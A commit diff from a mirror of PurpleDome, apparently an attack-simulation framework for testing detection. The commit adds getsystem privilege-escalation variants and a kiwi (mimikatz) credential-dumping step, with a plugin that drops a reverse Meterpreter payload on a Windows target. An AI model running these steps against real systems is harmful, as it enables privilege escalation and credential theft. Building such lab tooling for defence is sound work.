archive
/
PurpleDome
mirror of https://github.com/avast/PurpleDome
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixing Metasploit getsystem

Browse Source
pull/12/head
Thorsten Sick 3 years ago
parent 2100d1ff58
commit 7bce52b02a
2 changed files with 82 additions and 9 deletions
Show Stats Download Patch File Download Diff File

78
app/metasploit.py
Unescape Escape View File

@ -471,7 +471,7 @@ class MetasploitInstant(Metasploit):
tactics=tactics, tactics=tactics,
tactics_id=tactics_id, tactics_id=tactics_id,
ttp=ttp) ttp=ttp)
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target, delay=5)
print(f"Result of migrate {res}") print(f"Result of migrate {res}")
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
@ -553,19 +553,27 @@ class MetasploitInstant(Metasploit):
result=res) result=res)
return res return res
def getsystem(self, target, **kwargs): def getsystem(self, target, variant=0, **kwargs):
""" Do a network discovery on the target """ """ Do a network discovery on the target
@param target: Target to attack
@param variant: Variant of getsystem to use. 0 is auto, max is 3
"""
command = "getsystem" command = "getsystem"
ttp = "????" # It uses one out of three different ways to elevate privileges. ttp = "????" # It uses one out of three different ways to elevate privileges.
tactics = "Privilege Escalation" tactics = "Privilege Escalation"
tactics_id = "TA0004" tactics_id = "TA0004"
description = """ description = """
Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried: Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:\n
* named pipe impersonation using cmd 0) auto \n
* named pipe impersonation using a dll 1) named pipe impersonation using cmd \n
* token duplication 2) named pipe impersonation using a dll \n
3) token duplication\n
""" """
if variant != 0:
command += f" -t {variant}"
# https://docs.rapid7.com/metasploit/meterpreter-getsystem/ # https://docs.rapid7.com/metasploit/meterpreter-getsystem/
self.attack_logger.vprint( self.attack_logger.vprint(
@ -762,3 +770,59 @@ Uploading new files to the target. Can be config files, tools, implants, ...
logid=logid, logid=logid,
result=res) result=res)
return res return res
def kiwi(self, target, variant="creds_all", **kwargs):
""" Kiwi is the modern equivalent to mimikatz
@param target: target being attacked
@param variant: kiwi command being used
"""
ttp = "t1003"
tactics = "Credential access"
tactics_id = "TA0006"
description = """
Accessing user credentials in memory
"""
res = []
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Preparing for Kiwi{CommandlineColors.ENDC}", 1)
# We need system privileges
self.getsystem(target, 0, **kwargs)
# Kiwi needs to be loaded
command = "load kiwi "
res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
# Executing kiwi
command = f"{variant} "
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="kiwi",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description",
None),
countermeasure=kwargs.get("countermeasure", None)
)
res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
print(res)
return res

13
plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py
Unescape Escape View File

@ -4,6 +4,7 @@
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket
class MetasploitGetsystemPlugin(AttackPlugin): class MetasploitGetsystemPlugin(AttackPlugin):
@ -37,12 +38,20 @@ class MetasploitGetsystemPlugin(AttackPlugin):
attacker=self.attacker_machine_plugin, attacker=self.attacker_machine_plugin,
username=self.metasploit_user) username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
payload_name=payload_name, architecture="x64",
architecture="x64") platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
# TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
metasploit.getsystem(target, metasploit.getsystem(target,
variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
) )

Write Preview
Loading…
Cancel
Save